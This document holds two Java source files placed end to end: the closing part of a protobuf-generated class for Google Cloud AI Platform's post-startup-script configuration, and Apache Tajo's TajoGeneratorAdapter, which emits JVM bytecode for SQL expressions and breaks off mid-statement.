(com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); postStartupScriptUrl_ = s; return s; } else { return (java.lang.String) ref; } } /** * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for postStartupScriptUrl. */ public com.google.protobuf.ByteString getPostStartupScriptUrlBytes() { java.lang.Object ref = postStartupScriptUrl_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); postStartupScriptUrl_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The postStartupScriptUrl to set. * @return This builder for chaining. */ public Builder setPostStartupScriptUrl(java.lang.String value) { if (value == null) { throw new NullPointerException(); } postStartupScriptUrl_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearPostStartupScriptUrl() { postStartupScriptUrl_ = getDefaultInstance().getPostStartupScriptUrl(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The bytes for postStartupScriptUrl to set. * @return This builder for chaining. */ public Builder setPostStartupScriptUrlBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); postStartupScriptUrl_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private int postStartupScriptBehavior_ = 0; /** * <code> * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The enum numeric value on the wire for postStartupScriptBehavior. */ @java.lang.Override public int getPostStartupScriptBehaviorValue() { return postStartupScriptBehavior_; } /** * <code> * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @param value The enum numeric value on the wire for postStartupScriptBehavior to set. * @return This builder for chaining. */ public Builder setPostStartupScriptBehaviorValue(int value) { postStartupScriptBehavior_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * <code> * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The postStartupScriptBehavior. */ @java.lang.Override public com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior getPostStartupScriptBehavior() { com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior result = com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior .forNumber(postStartupScriptBehavior_); return result == null ? com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior .UNRECOGNIZED : result; } /** * <code> * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @param value The postStartupScriptBehavior to set. * @return This builder for chaining. */ public Builder setPostStartupScriptBehavior( com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior value) { if (value == null) { throw new NullPointerException(); } bitField0_ |= 0x00000004; postStartupScriptBehavior_ = value.getNumber(); onChanged(); return this; } /** * <code> * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return This builder for chaining. */ public Builder clearPostStartupScriptBehavior() { bitField0_ = (bitField0_ & ~0x00000004); postStartupScriptBehavior_ = 0; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.aiplatform.v1beta1.PostStartupScriptConfig) } // @@protoc_insertion_point(class_scope:google.cloud.aiplatform.v1beta1.PostStartupScriptConfig) private static final com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig(); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<PostStartupScriptConfig> PARSER = new com.google.protobuf.AbstractParser<PostStartupScriptConfig>() { @java.lang.Override public PostStartupScriptConfig parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<PostStartupScriptConfig> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<PostStartupScriptConfig> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/tajo
35,790
tajo-core/src/main/java/org/apache/tajo/engine/codegen/TajoGeneratorAdapter.java
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.tajo.engine.codegen; import com.google.common.base.Preconditions; import com.google.common.collect.Maps; import org.apache.tajo.common.TajoDataTypes; import org.apache.tajo.datum.*; import org.apache.tajo.exception.InvalidValueForCastException; import org.apache.tajo.exception.TajoRuntimeException; import org.apache.tajo.exception.UnsupportedException; import org.apache.tajo.org.objectweb.asm.Label; import org.apache.tajo.org.objectweb.asm.MethodVisitor; import org.apache.tajo.org.objectweb.asm.Opcodes; import org.apache.tajo.org.objectweb.asm.Type; import org.apache.tajo.org.objectweb.asm.commons.GeneratorAdapter; import org.apache.tajo.org.objectweb.asm.commons.TableSwitchGenerator; import org.apache.tajo.plan.expr.EvalNode; import org.apache.tajo.plan.expr.EvalType; import org.apache.tajo.type.Char; import org.apache.tajo.util.TUtil; import org.apache.tajo.util.datetime.DateTimeUtil; import java.util.HashMap; import java.util.Map; import static org.apache.tajo.common.TajoDataTypes.Type.*; class TajoGeneratorAdapter { public static final Map<EvalType, Map<TajoDataTypes.Type, Integer>> OpCodesMap = Maps.newHashMap(); static { TUtil.putToNestedMap(OpCodesMap, EvalType.PLUS, INT1, Opcodes.IADD); TUtil.putToNestedMap(OpCodesMap, EvalType.PLUS, INT2, Opcodes.IADD); TUtil.putToNestedMap(OpCodesMap, EvalType.PLUS, INT4, Opcodes.IADD); TUtil.putToNestedMap(OpCodesMap, EvalType.PLUS, INT8, Opcodes.LADD); TUtil.putToNestedMap(OpCodesMap, EvalType.PLUS, FLOAT4, Opcodes.FADD); TUtil.putToNestedMap(OpCodesMap, EvalType.PLUS, FLOAT8, Opcodes.DADD); TUtil.putToNestedMap(OpCodesMap, EvalType.MINUS, INT1, Opcodes.ISUB); TUtil.putToNestedMap(OpCodesMap, EvalType.MINUS, INT2, Opcodes.ISUB); TUtil.putToNestedMap(OpCodesMap, EvalType.MINUS, INT4, Opcodes.ISUB); TUtil.putToNestedMap(OpCodesMap, EvalType.MINUS, INT8, Opcodes.LSUB); TUtil.putToNestedMap(OpCodesMap, EvalType.MINUS, FLOAT4, Opcodes.FSUB); TUtil.putToNestedMap(OpCodesMap, EvalType.MINUS, FLOAT8, Opcodes.DSUB); TUtil.putToNestedMap(OpCodesMap, EvalType.MULTIPLY, INT1, Opcodes.IMUL); TUtil.putToNestedMap(OpCodesMap, EvalType.MULTIPLY, INT2, Opcodes.IMUL); TUtil.putToNestedMap(OpCodesMap, EvalType.MULTIPLY, INT4, Opcodes.IMUL); TUtil.putToNestedMap(OpCodesMap, EvalType.MULTIPLY, INT8, Opcodes.LMUL); TUtil.putToNestedMap(OpCodesMap, EvalType.MULTIPLY, FLOAT4, Opcodes.FMUL); TUtil.putToNestedMap(OpCodesMap, EvalType.MULTIPLY, FLOAT8, Opcodes.DMUL); TUtil.putToNestedMap(OpCodesMap, EvalType.DIVIDE, INT1, Opcodes.IDIV); TUtil.putToNestedMap(OpCodesMap, EvalType.DIVIDE, INT2, Opcodes.IDIV); TUtil.putToNestedMap(OpCodesMap, EvalType.DIVIDE, INT4, Opcodes.IDIV); TUtil.putToNestedMap(OpCodesMap, EvalType.DIVIDE, INT8, Opcodes.LDIV); TUtil.putToNestedMap(OpCodesMap, EvalType.DIVIDE, FLOAT4, Opcodes.FDIV); TUtil.putToNestedMap(OpCodesMap, EvalType.DIVIDE, FLOAT8, Opcodes.DDIV); TUtil.putToNestedMap(OpCodesMap, EvalType.MODULAR, INT1, Opcodes.IREM); TUtil.putToNestedMap(OpCodesMap, EvalType.MODULAR, INT2, Opcodes.IREM); TUtil.putToNestedMap(OpCodesMap, EvalType.MODULAR, INT4, Opcodes.IREM); TUtil.putToNestedMap(OpCodesMap, EvalType.MODULAR, INT8, Opcodes.LREM); TUtil.putToNestedMap(OpCodesMap, EvalType.MODULAR, FLOAT4, Opcodes.FREM); TUtil.putToNestedMap(OpCodesMap, EvalType.MODULAR, FLOAT8, Opcodes.DREM); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_AND, INT1, Opcodes.IAND); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_AND, INT2, Opcodes.IAND); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_AND, INT4, Opcodes.IAND); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_AND, INT8, Opcodes.LAND); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_OR, INT1, Opcodes.IOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_OR, INT2, Opcodes.IOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_OR, INT4, Opcodes.IOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_OR, INT8, Opcodes.LOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_XOR, INT1, Opcodes.IXOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_XOR, INT2, Opcodes.IXOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_XOR, INT4, Opcodes.IXOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_XOR, INT8, Opcodes.LXOR); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, INT1, Opcodes.IF_ICMPEQ); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, INT2, Opcodes.IF_ICMPEQ); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, INT4, Opcodes.IF_ICMPEQ); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, FLOAT8, Opcodes.DCMPG); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, TEXT, Opcodes.IF_ACMPNE); TUtil.putToNestedMap(OpCodesMap, EvalType.NOT_EQUAL, INT1, Opcodes.IF_ICMPNE); TUtil.putToNestedMap(OpCodesMap, EvalType.NOT_EQUAL, INT2, Opcodes.IF_ICMPNE); TUtil.putToNestedMap(OpCodesMap, EvalType.NOT_EQUAL, INT4, Opcodes.IF_ICMPNE); TUtil.putToNestedMap(OpCodesMap, EvalType.NOT_EQUAL, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.NOT_EQUAL, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.NOT_EQUAL, FLOAT8, Opcodes.DCMPG); TUtil.putToNestedMap(OpCodesMap, EvalType.NOT_EQUAL, TEXT, Opcodes.IF_ACMPNE); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT1, Opcodes.IF_ICMPLT); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT2, Opcodes.IF_ICMPLT); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT4, Opcodes.IF_ICMPLT); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, FLOAT8, Opcodes.DCMPG); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT1, Opcodes.IF_ICMPLT); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT2, Opcodes.IF_ICMPLT); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT4, Opcodes.IF_ICMPLT); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, FLOAT8, Opcodes.DCMPG); TUtil.putToNestedMap(OpCodesMap, EvalType.LEQ, INT1, Opcodes.IF_ICMPLE); TUtil.putToNestedMap(OpCodesMap, EvalType.LEQ, INT2, Opcodes.IF_ICMPLE); TUtil.putToNestedMap(OpCodesMap, EvalType.LEQ, INT4, Opcodes.IF_ICMPLE); TUtil.putToNestedMap(OpCodesMap, EvalType.LEQ, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.LEQ, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.LEQ, FLOAT8, Opcodes.DCMPG); TUtil.putToNestedMap(OpCodesMap, EvalType.GTH, INT1, Opcodes.IF_ICMPGT); TUtil.putToNestedMap(OpCodesMap, EvalType.GTH, INT2, Opcodes.IF_ICMPGT); TUtil.putToNestedMap(OpCodesMap, EvalType.GTH, INT4, Opcodes.IF_ICMPGT); TUtil.putToNestedMap(OpCodesMap, EvalType.GTH, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.GTH, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.GTH, FLOAT8, Opcodes.DCMPG); TUtil.putToNestedMap(OpCodesMap, EvalType.GEQ, INT1, Opcodes.IF_ICMPGE); TUtil.putToNestedMap(OpCodesMap, EvalType.GEQ, INT2, Opcodes.IF_ICMPGE); TUtil.putToNestedMap(OpCodesMap, EvalType.GEQ, INT4, Opcodes.IF_ICMPGE); TUtil.putToNestedMap(OpCodesMap, EvalType.GEQ, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.GEQ, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.GEQ, FLOAT8, Opcodes.DCMPG); } protected int access; protected MethodVisitor methodvisitor; protected GeneratorAdapter generatorAdapter; public TajoGeneratorAdapter() {} public TajoGeneratorAdapter(int access, MethodVisitor methodVisitor, String name, String desc) { this.access = access; this.methodvisitor = methodVisitor; generatorAdapter = new GeneratorAdapter(methodVisitor, access, name, desc); } public static boolean isJVMInternalInt(org.apache.tajo.type.Type type) { final TajoDataTypes.Type baseType = type.kind(); return baseType == BOOLEAN || baseType == INT1 || baseType == INT2 || baseType == INT4; } public static int getWordSize(org.apache.tajo.type.Type type) { final TajoDataTypes.Type baseType = type.kind(); if (baseType == INT8 || baseType == FLOAT8 || baseType == TIMESTAMP || baseType == TIME) { return 2; } else { return 1; } } public void push(final boolean value) { methodvisitor.visitInsn(value ? Opcodes.ICONST_1 : Opcodes.ICONST_0); } public void push(final int value) { if (value >= -1 && value <= 5) { methodvisitor.visitInsn(Opcodes.ICONST_0 + value); } else if (value >= Byte.MIN_VALUE && value <= Byte.MAX_VALUE) { methodvisitor.visitIntInsn(Opcodes.BIPUSH, value); } else if (value >= Short.MIN_VALUE && value <= Short.MAX_VALUE) { methodvisitor.visitIntInsn(Opcodes.SIPUSH, value); } else { methodvisitor.visitLdcInsn(Integer.valueOf(value)); } } public void push(final long value) { if (value == 0L || value == 1L) { methodvisitor.visitInsn(Opcodes.LCONST_0 + (int) value); } else { methodvisitor.visitLdcInsn(Long.valueOf(value)); } } public void push(final float value) { int bits = Float.floatToIntBits(value); if (bits == 0L || bits == 0x3f800000 || bits == 0x40000000) { // 0..2 methodvisitor.visitInsn(Opcodes.FCONST_0 + (int) value); } else { methodvisitor.visitLdcInsn(Float.valueOf(value)); } } public void push(final double value) { long bits = Double.doubleToLongBits(value); if (bits == 0L || bits == 0x3ff0000000000000L) { // +0.0d and 1.0d methodvisitor.visitInsn(Opcodes.DCONST_0 + (int) value); } else { methodvisitor.visitLdcInsn(new Double(value)); } } public void push(final String value) { Preconditions.checkNotNull(value); methodvisitor.visitLdcInsn(value); } public void ifCmp(org.apache.tajo.type.Type type, EvalType evalType, Label elseLabel) { if (isJVMInternalInt(type)) { switch (evalType) { case EQUAL: methodvisitor.visitJumpInsn(Opcodes.IF_ICMPNE, elseLabel); break; case NOT_EQUAL: methodvisitor.visitJumpInsn(Opcodes.IF_ICMPEQ, elseLabel); break; case LTH: methodvisitor.visitJumpInsn(Opcodes.IF_ICMPGE, elseLabel); break; case LEQ: methodvisitor.visitJumpInsn(Opcodes.IF_ICMPGT, elseLabel); break; case GTH: methodvisitor.visitJumpInsn(Opcodes.IF_ICMPLE, elseLabel); break; case GEQ: methodvisitor.visitJumpInsn(Opcodes.IF_ICMPLT, elseLabel); break; default: throw new CompilationError("Unknown comparison operator: " + evalType.name()); } } else { if (type.kind() == TEXT) { invokeVirtual(String.class, "compareTo", int.class, new Class[]{String.class}); } else { int opCode = TajoGeneratorAdapter.getOpCode(evalType, type); methodvisitor.visitInsn(opCode); } switch (evalType) { case EQUAL: methodvisitor.visitJumpInsn(Opcodes.IFNE, elseLabel); break; case NOT_EQUAL: methodvisitor.visitJumpInsn(Opcodes.IFEQ, elseLabel); break; case LTH: methodvisitor.visitJumpInsn(Opcodes.IFGE, elseLabel); break; case LEQ: methodvisitor.visitJumpInsn(Opcodes.IFGT, elseLabel); break; case GTH: methodvisitor.visitJumpInsn(Opcodes.IFLE, elseLabel); break; case GEQ: methodvisitor.visitJumpInsn(Opcodes.IFLT, elseLabel); break; default: throw new CompilationError("Unknown comparison operator: " + evalType.name()); } } } public void load(org.apache.tajo.type.Type type, int idx) { switch (type.kind()) { case NULL_TYPE: case BOOLEAN: case CHAR: case INT1: case INT2: case INT4: methodvisitor.visitVarInsn(Opcodes.ILOAD, idx); break; case INT8: methodvisitor.visitVarInsn(Opcodes.LLOAD, idx); break; case FLOAT4: methodvisitor.visitVarInsn(Opcodes.FLOAD, idx); break; case FLOAT8: methodvisitor.visitVarInsn(Opcodes.DLOAD, idx); break; case TEXT: case INTERVAL: case PROTOBUF: methodvisitor.visitVarInsn(Opcodes.ALOAD, idx); break; default: throw new CompilationError("Unknown data type: " + type); } } public static String getDescription(Class clazz) { if (clazz == null) { return ""; } else if (clazz == void.class) { return "V"; } else if (clazz == boolean.class) { return "Z"; } else if (clazz == char.class) { return "C"; } else if (clazz == byte.class) { return "B"; } else if (clazz == short.class) { return "S"; } else if (clazz == int.class) { return "I"; } else if (clazz == long.class) { return "J"; } else if (clazz == float.class) { return "F"; } else if (clazz == double.class) { return "D"; } else if (clazz.isArray()) { return "[" + getDescription(clazz.getComponentType()); } else { return "L" + getInternalName(clazz) + ";"; } } public static String getMethodDescription(Class returnType, Class [] argumentTypes) { StringBuilder builder = new StringBuilder(); builder.append("("); if (argumentTypes != null) { for (Class argType : argumentTypes) { builder.append(getDescription(argType)); } } builder.append(")"); builder.append(getDescription(returnType)); return builder.toString(); } public Label newLabel() { return new Label(); } public void markLabel(Label label) { methodvisitor.visitLabel(label); } public void gotoLabel(Label label) { methodvisitor.visitJumpInsn(Opcodes.GOTO, label); } public void pushBooleanOfThreeValuedLogic(boolean value) { push(value ? 1 : 2); // TRUE or FALSE } public void pushNullOfThreeValuedLogic() { push(0); // NULL of three valued logic } public void pushNullFlag(boolean trueIfNotNull) { push(trueIfNotNull ? true : false); } public void emitNullityCheck(Label ifNull) { methodvisitor.visitJumpInsn(Opcodes.IFEQ, ifNull); } /** * If at least one of all local variables corresponding to <code>varIds</code> is null, jump the <code>label</code>. * * @param ifNull The label to jump * @param varIds A list of variable Ids. */ public void emitNullityCheck(Label ifNull, int ... varIds) { // TODO - ANDing can be reduced if we interleave IAND into a sequence of ILOAD instructions. for (int varId : varIds) { methodvisitor.visitVarInsn(Opcodes.ILOAD, varId); } if (varIds.length > 1) { for (int i = 0; i < varIds.length - 1; i++) { methodvisitor.visitInsn(Opcodes.IAND); } } emitNullityCheck(ifNull); } public void pushDummyValue(org.apache.tajo.type.Type type) { TajoDataTypes.Type baseType = type.kind(); if (type.isNull()) { pushNullOfThreeValuedLogic(); } else if (isJVMInternalInt(type) || baseType == DATE) { push(0); } else if (baseType == INT8 || baseType == TIMESTAMP || baseType == TIME) { push(0L); } else if (baseType == FLOAT8) { push(0.0d); } else if (baseType == FLOAT4) { push(0.0f); } else if (baseType == CHAR || baseType == TEXT) { push(""); } else if (baseType == INTERVAL || baseType == PROTOBUF) { invokeStatic(NullDatum.class, "get", NullDatum.class, new Class[]{}); } else { assert false; } } public void newInstance(Class owner, Class [] paramTypes) { methodvisitor.visitMethodInsn(Opcodes.INVOKESPECIAL, getInternalName(owner), "<init>", getMethodDescription(void.class, paramTypes)); } public void invokeSpecial(Class owner, String methodName, Class returnType, Class [] paramTypes) { methodvisitor.visitMethodInsn(Opcodes.INVOKESPECIAL, getInternalName(owner), methodName, getMethodDescription(returnType, paramTypes)); } public void invokeStatic(Class owner, String methodName, Class returnType, Class [] paramTypes) { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, getInternalName(owner), methodName, getMethodDescription(returnType, paramTypes)); } public void invokeVirtual(Class owner, String methodName, Class returnType, Class [] paramTypes) { methodvisitor.visitMethodInsn(Opcodes.INVOKEVIRTUAL, Type.getInternalName(owner), methodName, getMethodDescription(returnType, paramTypes)); } public void invokeInterface(Class owner, String methodName, Class returnType, Class [] paramTypes) { methodvisitor.visitMethodInsn(Opcodes.INVOKEINTERFACE, Type.getInternalName(owner), methodName, getMethodDescription(returnType, paramTypes)); } public static boolean isPrimitiveOpCode(EvalType evalType, org.apache.tajo.type.Type returnType) { return TUtil.containsInNestedMap(OpCodesMap, evalType, returnType.kind()); } public static int getOpCode(EvalType evalType, org.apache.tajo.type.Type returnType) { if (!isPrimitiveOpCode(evalType, returnType)) { throw new CompilationError("No Such OpCode for " + evalType + " returning " + returnType); } return TUtil.getFromNestedMap(OpCodesMap, evalType, returnType.kind()); } public void castInsn(org.apache.tajo.type.Type srcType, org.apache.tajo.type.Type targetType) { TajoDataTypes.Type srcBaseType = srcType.kind(); TajoDataTypes.Type targetBaseType = targetType.kind(); switch(srcBaseType) { case BOOLEAN: case CHAR: { Char srcCharType = (Char) srcType; if (srcCharType.length() == 1) { switch (targetBaseType) { case CHAR: case INT1: case INT2: case INT4: break; case INT8: methodvisitor.visitInsn(Opcodes.I2L); break; case FLOAT4: methodvisitor.visitInsn(Opcodes.I2F); break; case FLOAT8: methodvisitor.visitInsn(Opcodes.I2D); break; case TEXT: emitStringValueOfChar(); break; default: throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType)); } } else { switch (targetBaseType) { case CHAR: case INT1: case INT2: case INT4: emitParseInt4(); break; case INT8: emitParseInt8(); break; case FLOAT4: emitParseFloat4(); break; case FLOAT8: emitParseFloat8(); break; case TEXT: break; default: throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType)); } } break; } case INT1: case INT2: case INT4: switch (targetBaseType) { case CHAR: case INT1: methodvisitor.visitInsn(Opcodes.I2C); break; case INT2: methodvisitor.visitInsn(Opcodes.I2S); break; case INT4: return; case INT8: methodvisitor.visitInsn(Opcodes.I2L); break; case FLOAT4: methodvisitor.visitInsn(Opcodes.I2F); break; case FLOAT8: methodvisitor.visitInsn(Opcodes.I2D); break; case TEXT: emitStringValueOfInt4(); break; default: throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType)); } break; case INT8: switch (targetBaseType) { case CHAR: case INT1: case INT2: case INT4: methodvisitor.visitInsn(Opcodes.L2I); break; case INT8: return; case FLOAT4: methodvisitor.visitInsn(Opcodes.L2F); break; case FLOAT8: methodvisitor.visitInsn(Opcodes.L2D); break; case TEXT: emitStringValueOfInt8(); break; default: throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType)); } break; case FLOAT4: switch (targetBaseType) { case CHAR: case INT1: case INT2: case INT4: methodvisitor.visitInsn(Opcodes.F2I); break; case INT8: methodvisitor.visitInsn(Opcodes.F2L); break; case FLOAT4: return; case FLOAT8: methodvisitor.visitInsn(Opcodes.F2D); break; case TEXT: emitStringValueOfFloat4(); break; default: throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType)); } break; case FLOAT8: switch (targetBaseType) { case CHAR: case INT1: case INT2: case INT4: methodvisitor.visitInsn(Opcodes.D2I); break; case INT8: methodvisitor.visitInsn(Opcodes.D2L); break; case FLOAT4: methodvisitor.visitInsn(Opcodes.D2F); break; case FLOAT8: return; case TEXT: emitStringValueOfFloat8(); break; default: throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType)); } break; case TEXT: switch (targetBaseType) { case CHAR: case INT1: case INT2: case INT4: emitParseInt4(); break; case INT8: emitParseInt8(); break; case FLOAT4: emitParseFloat4(); break; case FLOAT8: emitParseFloat8(); break; case TEXT: break; case TIMESTAMP: { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(DateTimeUtil.class), "toJulianTimestampWithTZ", "(L" + Type.getInternalName(String.class) + ";)J"); break; } case DATE: { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(DateTimeUtil.class), "toJulianDate", "(L" + Type.getInternalName(String.class) + ";)I"); break; } case TIME: { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(DateTimeUtil.class), "toJulianTime", "(L" + Type.getInternalName(String.class) + ";)J"); break; } default: throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType)); } break; default: throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType)); } } public static String getInternalName(String className) { return className.replace('.', '/'); } public static String getInternalName(Class clazz) { return clazz.getName().replace('.', '/'); } public void convertToPrimitive(org.apache.tajo.type.Type type) { Label ifNull = new Label(); Label afterAll = new Label(); // datum int datum = astore(); aload(datum); invokeVirtual(Datum.class, "isNotNull", boolean.class, new Class [] {}); methodvisitor.visitJumpInsn(Opcodes.IFEQ, ifNull); // datum aload(datum); switch (type.kind()) { case BOOLEAN: case INT1: case INT2: invokeVirtual(Datum.class, "asInt2", short.class, new Class[] {}); break; case INT4: case DATE: invokeVirtual(Datum.class, "asInt4", int.class, new Class[] {}); break; case INT8: case TIMESTAMP: case TIME: invokeVirtual(Datum.class, "asInt8", long.class, new Class[] {}); break; case FLOAT4: invokeVirtual(Datum.class, "asFloat4", float.class, new Class[] {}); break; case FLOAT8: invokeVirtual(Datum.class, "asFloat8", double.class, new Class[] {}); break; case CHAR: case TEXT: invokeVirtual(Datum.class, "asChars", String.class, new Class[]{}); break; default: throw new TajoRuntimeException(new UnsupportedException("data type '" + type + "'")); } pushNullFlag(true); gotoLabel(afterAll); methodvisitor.visitLabel(ifNull); pushDummyValue(type); pushNullFlag(false); methodvisitor.visitLabel(afterAll); } public void convertToDatum(org.apache.tajo.type.Type type, boolean castToDatum) { String convertMethod; Class returnType; Class [] paramTypes; switch (type.kind()) { case NULL_TYPE: pop(); // pop null flag pop(type); // pop null datum invokeStatic(NullDatum.class, "get", NullDatum.class, new Class[] {}); if (castToDatum) { methodvisitor.visitTypeInsn(Opcodes.CHECKCAST, getInternalName(Datum.class)); } return; case BOOLEAN: convertMethod = "createBool"; returnType = Datum.class; paramTypes = new Class[] {int.class}; break; case CHAR: convertMethod = "createChar"; returnType = CharDatum.class; paramTypes = new Class[] {String.class}; break; case INT1: case INT2: convertMethod = "createInt2"; returnType = Int2Datum.class; paramTypes = new Class[] {short.class}; break; case INT4: convertMethod = "createInt4"; returnType = Int4Datum.class; paramTypes = new Class[] {int.class}; break; case INT8: convertMethod = "createInt8"; returnType = Int8Datum.class; paramTypes = new Class[] {long.class}; break; case FLOAT4: convertMethod = "createFloat4"; returnType = Float4Datum.class; paramTypes = new Class[] {float.class}; break; case FLOAT8: convertMethod = "createFloat8"; returnType = Float8Datum.class; paramTypes = new Class[] {double.class}; break; case TEXT: convertMethod = "createText"; returnType = TextDatum.class; paramTypes = new Class[] {String.class}; break; case TIMESTAMP: convertMethod = 